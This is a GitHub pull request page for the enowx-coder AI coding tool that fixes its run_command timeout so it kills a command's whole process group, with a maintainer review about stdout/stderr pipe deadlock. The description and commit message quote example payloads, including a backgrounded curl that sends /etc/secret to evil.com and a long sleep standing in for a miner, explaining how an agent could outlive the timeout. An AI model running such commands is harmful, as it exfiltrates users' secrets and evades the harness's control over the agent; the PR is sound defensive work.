Skip to content

fix(security): kill descendant processes when run_command times out#34

Merged
enowdev merged 5 commits into
enowdev:mainfrom
kevinnft:fix/run-command-process-group
May 19, 2026
Merged

fix(security): kill descendant processes when run_command times out#34
enowdev merged 5 commits into
enowdev:mainfrom
kevinnft:fix/run-command-process-group

Conversation

@kevinnft
Copy link
Copy Markdown
Contributor

Summary

Tokio's kill_on_drop(true) only kills the direct child (the shell enowx-coder spawns), not the shell's descendants. An agent can exploit this to leave long-running processes behind even after the timeout supposedly killed them:

run_command  sh -c '(curl evil.com -d @/etc/secret &)'
            # parent shell exits in milliseconds; backgrounded curl
            # keeps running for the full TCP timeout, exfiltrating
            # data even after the timeout fires and the tool call
            # returns "Command timed out".

run_command  sh -c '(sleep 3600 &)'
            # crypto miner, beacon, etc — survives forever.

Empirically confirmed: the orphan continues to run after the parent shell is dropped, because it inherits the parent process group and gets reparented to PID 1.

Fix

  • Spawn the child in its own process group on Unix via process_group(0).
  • Capture the child PID before consuming the handle.
  • On timeout, killpg(SIGKILL) the entire group so every descendant the shell forked is reaped, not just the shell itself.
  • Restructure I/O capture: drive stdout/stderr reads alongside wait() directly, since wait_with_output consumes the Child and we need it accessible for the kill path.

Adds libc as a Unix-only dependency (only used for killpg). Windows behavior is unchanged — kill_on_drop already terminates the cmd.exe job there.

Regression test

test_run_command_timeout_kills_backgrounded_children schedules a backgrounded descendant that would write a proof file 3 seconds after the parent shell exits. Before the fix the file appears; after the fix it does not.

Note

Built on top of #22 to inherit the clippy fixes, since main still has the 122-error block. Diff against main collapses to the executor + Cargo.toml changes once #22 lands.

Test plan

  • cargo test -p enowx-coder run_command_timeout — both existing and new test pass
  • cargo clippy -- -D warnings clean
  • Manual on Linux: trigger run_command with (sleep 30 &) payload, confirm pgrep -f "sleep 30" is empty after timeout

Copy link
Copy Markdown
Owner

@enowdev enowdev left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for tackling the timeout escape. I’m blocking this as-is because run_command now drains stdout to EOF and only then drains stderr before wait() (src-tauri/src/tools/executor.rs:327-337). If the child writes enough to stderr while stdout is still being drained, the stderr pipe can fill, the child blocks on write, stdout never reaches EOF, and the timeout path becomes the only exit. This is a classic pipe deadlock regression compared with wait_with_output(), which reads both streams concurrently. Please switch to concurrent stdout/stderr draining (or another approach that preserves simultaneous consumption) before merging.

Tokio's kill_on_drop only kills the direct child (the shell), not the
shell's descendants. An agent could exploit this to leave long-running
processes behind:

  run_command  sh -c '(curl evil.com -d @/etc/secret &)'
              # parent shell exits in milliseconds; backgrounded curl
              # keeps running for the full TCP timeout, exfiltrating
              # data even after the timeout fires and the tool call
              # returns "Command timed out".

  run_command  sh -c '(sleep 3600 &)'
              # crypto miner, beacon, etc — survives forever.

Empirically confirmed: with the previous code, the orphan continues to
run after the parent shell is dropped, because it inherits the parent
process group and is reparented to PID 1.

The fix:

- Spawn the child in its own process group on Unix (process_group(0)).
- Capture the child PID before consuming the handle.
- On timeout, killpg(SIGKILL) the entire group so every descendant
  the shell forked is reaped, not just the shell itself.
- Restructure I/O capture to drive stdout/stderr reads alongside wait()
  instead of using wait_with_output, since we need the child handle to
  remain accessible for the kill path.

Adds libc as a Unix-only dependency (only used for killpg).

A regression test schedules a backgrounded descendant that would write
a proof file 3 seconds after the parent shell exits. Before the fix
the file appears; after the fix it does not.
@enowdev enowdev force-pushed the fix/run-command-process-group branch from c026153 to 57a46d8 Compare May 19, 2026 16:12
Copy link
Copy Markdown
Owner

@enowdev enowdev left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Conflict resolution is in and the timeout fix now keeps concurrent stdout/stderr consumption while still killing the full process group on timeout, so the earlier pipe-deadlock concern is addressed.

@enowdev enowdev merged commit 0c76ade into enowdev:main May 19, 2026
2 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants